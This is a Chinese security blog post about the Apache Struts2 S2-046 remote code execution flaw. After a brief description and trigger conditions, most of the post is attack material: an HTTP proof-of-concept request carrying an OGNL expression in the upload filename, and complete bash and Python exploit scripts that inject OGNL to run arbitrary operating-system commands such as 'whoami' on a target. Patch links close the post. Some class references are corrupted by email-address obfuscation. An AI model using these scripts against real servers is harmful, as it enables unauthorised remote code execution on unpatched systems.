安全圈 | 专注于最新网络信息安全讯息新闻

 首页

046漏洞

作者 recor 时间 2020-02-27
all

發表於2017-03-21 | 分類於web安全 | 熱度℃

免責申明:文章中的工具等僅供個人測試研究,請在下載後24小時內删除,不得用於商業或非法用途,否則後果自負Apache Struts 2 2.3.32之前的2 2.3.x版本和2.5.10.1之前的2.5.x版本中的Jakarta Multipart解析器存在安全性漏洞,該漏洞源於程式沒有正確處理文件上傳。攻擊者可以通過構造HTTP請求頭中的Content-Type值可能造成遠程任意程式碼執行,S2-046與S2-045漏洞屬於同一類型,不同向量。如果在之前S2-045漏洞曝光後用戶已經陞級過官方補丁,這次就不受影響。

觸發條件

1.上傳文件的大小(由Content-Length頭指定)大於Struts2允許的最大大小(2GB)。2.檔名內容構造惡意的OGNL內容。

S2-046PoC

1

2

3

4

5

6

7

8

9

10

11

12

POST /doUpload.action HTTP/1.1

Host: localhost:8080

Content-Length: 10000000

Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z

Connection: close

------WebKitFormBoundaryAnmUgTEhFhOZpr9z

Content-Disposition: form-data;name=“upload”;filename=“%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}”

Content-Type: text/plain

Kaboom

------WebKitFormBoundaryAnmUgTEhFhOZpr9z--

Exp

Sh版

1

2

3

4

5

6

7

8

9

10

11

12

#!/bin/bash

url=$1

cmd=$2

shift

shift

boundary=“---------------------------735323031399963166993862150”

content_type=“multipart/form-data;boundary=$boundary”

payload=$(echo“%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@ [email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='“$cmd”').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@ [email protected](#process.getInputStream(),#ros)).(#ros.flush())}“)

printf --“--$boundary\r\nContent-Disposition: form-data;name=\”foo\“;filename=\”%s\0b\“\r\nContent-Type: text/plain\r\n\r\nx\r\n--$boundary--\r\n\r\n”“$payload”| curl“$url”-H“Content-Type: $content_type”-H“Expect:”-H“Connection: close”--data-binary @- [email protected]

sh exploit-cd.sh http://xxx.com/action“whoami”

Python版

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

__author__ = 'hackteam.cn'

import pycurl

import StringIO

import urllib

def tt(url,data):

sio = StringIO.StringIO()

c = pycurl.Curl()

c.setopt(pycurl.URL,url)

c.setopt(pycurl.REFERER,url)

c.setopt(pycurl.HTTPHEADER,['Connection: close','Content-Type: multipart/form-data;boundary=---------------------------735323031399963166993862150','User-Agent: Mozilla/5.0(Windows NT 6.1;WOW64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/36.0.1985.143 Safari/537.36'])

c.setopt(pycurl.HTTP_VERSION,pycurl.CURL_HTTP_VERSION_1_0)

c.setopt(pycurl.POST,1)

c.setopt(pycurl.POSTFIELDS,data)

c.setopt(pycurl.CONNECTTIMEOUT,300)

c.setopt(pycurl.TIMEOUT,300)

c.setopt(pycurl.WRITEFUNCTION,sio.write)

try:

c.perform()

except Exception,ex:

pass

c.close()

resp = sio.getvalue()

sio.close()

return resp

data=“-----------------------------735323031399963166993862150\r\nContent-Disposition: form-data;name=\”foo\“;filename=\“%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=# container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/ bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@ [email protected](#process.getInputStream(),#ros)).(#ros.flush())}\0b\“\r\nContent-Type: text/plain\r\n\r\nx\r\n-----------------------------735323031399963166993862150--\r\n\r\n”

print tt('https://xxx.action',data)

修復建議

官網公告

https://cwiki.apache.org/confluence/display/WW/S2-045https://cwiki.apache.org/confluence/display/WW/S2-046

補丁地址

Struts 2.3.32:https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32Struts 2.5.10.1:https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1

參攷

http://struts.apache.org/docs/s2-045.htmlhttp://struts.apache.org/docs/s2-046.htmlhttps://community.hpe.com/t5/Security-Research/Struts2-046-A-new-vector/ba-p/6949723

傳送門

struts2-052漏洞struts2-046漏洞struts2_045漏洞struts2漏洞poc匯總

歡迎您掃一掃上面的微信公眾號,訂閱我的部落格!

熱門文章推薦:

© 2023